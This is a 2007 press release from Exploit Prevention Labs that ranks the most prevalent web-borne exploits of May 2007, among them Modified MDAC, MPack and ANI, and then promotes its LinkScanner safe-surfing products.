Press Releases
EXPLOIT PREVENTION LABS RELEASES MAY EXPLOIT PREVALENCE SURVEY
Modified MDAC and MPack Rise in Ranking, ANI Holds Steady
June 25, 2007 – Atlanta, GA – Exploit Prevention Labs (http://www.explabs.com), developer of the LinkScanner line of safe surfing software that protects against exploits, phishing, and other social engineering attacks, today released the results of its May 2007 Exploit Prevalence Survey™. Now in its thirteenth month, the Exploit Prevalence Survey is the industry’s only survey to use real-world data to definitively measure the most widespread web-borne exploits. Results are derived from automated reports submitted by LinkScanner users combined with data collected from all levels of the company’s multi-faceted research network.
Roger Thompson, CTO of Exploit Prevention Labs and author of the monthly Exploit Prevalence Survey, noted steady activity among cybercriminals in May. For the third consecutive month since its release, the Modified MDAC exploit was among the prevalence survey’s top five most active exploits, this month once again claiming the number one position with 32.9 percent of all occurrences.
“Modified MDAC is demonstrating impressive staying power - it’s clearly proving a profitable exploit for the bad guys, despite the availability of a patch,” said Thompson.
May’s second most prevalent exploit was the MPack exploit, with 12.8 percent of all occurrences. MPack, originallt named WebAttacker 2.0, was discovered in April, and mimics the distribution model of earlier WebAttacker-driven exploits.
According to Thompson, MPack is a set of professionally written php scripts being sold as a package of several different exploits that attack a wide range of unpatched systems. He suspects two of the most dangerous exploits in the package are the popular WinZip FileViewCtrl ActiveX dll, because there is no automatic update path for WinZip users to patch their systems, and the ANI exploit, because many IE users appear to be slow to patch.
MPack is a strong exploit package,” Thompson said. “It’s being used for a lot of web site hacks, particularly small sites where the operators lack the security expertise of larger organizations. As long as there are inexperienced webmasters out there, this kind of exploit package will continue to spread.”
Tied with MPack for the number two position was March’s highly publicized ANI exploit, which takes advantage of fully patched Windows XP SP2 machines running IE 6 or 7 to exploit how Windows’ handling of animated cursor (.ani) files. Microsoft released an emergency patch on April 3, but the exploit has continued to thrive on unpatched machines.
“ANI was a strong, fast-moving exploit,” Thompson noted. “Microsoft moved quickly to release an emergency patch, but its continued spread indicates that users are not patching their machines and leaving themselves vulnerable.”
The Q406 Roll-up package captured May’s number four spot, accounting for 6.8 percent of all occurrences. The package, which was discovered back in December and held the number one position on the survey for three straight months, consists of a dozen exploits including Setslice, MS07-004 and MS06-071
Rounding out the top five was the IE Com CreateObject exploit, responsible for five percent of all reported occurrences. Like several other exploits, IE Com CreateObject has been patched since 2006 but continues to find victims.
Thompson notes that, unlike virus and worm writers of a few years ago who were focused on large-scale crippling of the Internet for the thrills, today’s malware distribution network is populated by cybercriminals out to maximize their profit while minimizing their visibility.
“They wait for the right moment - Patch Tuesday is usually one of those moments - and then launch smaller, more targeted attacks using proven exploits to attack unpatched systems,” Thompson said. “It’s vital for people to patch their systems regularly and use added protection like LinkScanner.
Exploit Prevalence Results for the Month of May 2007
The following is a summary of the top five most-reported web exploits for May 2007:
Exploit |
Rank last month |
Percent of Overall Occurrences |
Description |
| Modified MDAC |
2 |
32.90 percent (23.92 previous) |
MDAC refers to a creative method of using certain ActiveX controls in a context Microsoft did not originally intend. An ActiveX control is instantiated inside a web script that allows files to be written to disk and executed. |
| MPack |
5 |
12.80 percent (9.10 previous) |
MPack is a set of professionally written php scripts that are being sold as a package and using similar distribution methods to earlier WebAttacker output. Hackers can purchase the package on underground markets and use it just like commercial software. The two most dangerous exploits inside the package are believed to be WinZip FileViewCtrl ActiveX dll and ANI. |
ANI |
4 |
12.80 percent (11.90 previous) |
Originally discovered and used by a group of Chinese hackers, the exploit takes advantage of Windows’ handling of animated cursor (.ani) files. At the time of its release into the wild, the ANI exploit infected fully patched Windows XP SP2 machines running IE 6 or 7. Microsoft released an emergency patch on April 3, but the exploit continues to attack unpatched machines. |
Q406 Roll-up package |
2 |
6.80 percent (9.33 previous) |
Comprising up to a dozen exploits including Setslice, VML, XML and IE COM CreateObject Code, the package is usually heavily encrypted. |
IE Com CreateObject code |
16 |
5.00 percent (0.08 previous) |
IE Com CreateObject was originally released in August 2006 as a proof of concept. The exploit creates a COM object in a mode that was never anticipated by Microsoft, and although it was intended for some useful purposes, the functions it enables are potentially dangerous in the hands of a cyber criminal such as saving files to the disk, or executing a file on the disk. |
Note: Numbers above do not add up to 100 percent, due to the following lesser reported exploits: TROJAN FAKE CODEC (4.40% vs. 3.27%), WMF (CVE-2005-2124) with known payload (4.20% vs. 2.45%), Search engine hijack (4.0% vs 2.1%), others (17.1%) |
Note to media: Members of the media who would like to interview Roger Thompson about this survey may contact Tim Shisler of Dovetail Public Relations at 408-395-3600 or at xpl (at) dovetailpr (dot) com.
For additional background information on exploits and how to protect against them, visit Exploit Prevention Lab’s comprehensive Threat Center at http://www.explabs.com/ss/threatCenter.asp.
About the LinkScanner Family of Safe Surfing Software
Exploit Prevention Labs offers a range of safe surfing software to protect Internet users against malicious web sites, phishing, social engineering and other web-based exploits.
The LinkScanner family of safe surfing products includes LinkScanner Pro™, LinkScanner Lite™, and LinkScanner Online. LinkScanner Pro (free 15-day trial: http://www.explabs.com/downloads/LSP), a $29.95 safe surfing application, provides real-time, automatic protection against malicious web sites, drive-by downloads and other crimeware exploits for Windows 2000, XP and Vista users running IE or Firefox browsers. LinkScanner Lite (http:// www.explabs.com/downloads/LSL) is a free application that provides Internet Explorer and Firefox users with real-time scanning of Google, MSN and Yahoo search results for web-based threats, as well as on-demand scanning of individual links.
LinkScanner Online, available at http://linkscanner.explabs.com, is a free real-time online URL scanning service that lets users know whether any individual site they intend to visit has been poisoned. LinkScanner Online supports all major web browsers and is freely available for incorporation into third-party websites. Interested webmasters can request the code through Exploit Prevention Labs’ website at http://www.explabs.com/LinkScanner/MyLinkScanner/.
About Exploit Prevention Labs
Founded by information security veterans Bob Bales and Roger Thompson in 2005, Exploit Prevention Labs develops the LinkScanner family of safe surfing software and services. LinkScanner Pro, LinkScanner Lite and LinkScanner Online provide patent-pending protection against malicious web sites and web-based exploits during the critical risk window between the announcement of a security vulnerability and the provision of a patch by the vendor. A Software Development Kit (SDK) is also available to enable third party vendors to incorporate Exploit Prevention Labs’ technology in their own applications and services. More information about Exploit Prevention Labs and LinkScanner may be found on the company’s website at http://www.explabs.com.
###
Media Contact:
Tim Shisler/Julie Parayno
Dovetail Public Relations
408.395.3600
xpl at dovetailpr.com
|
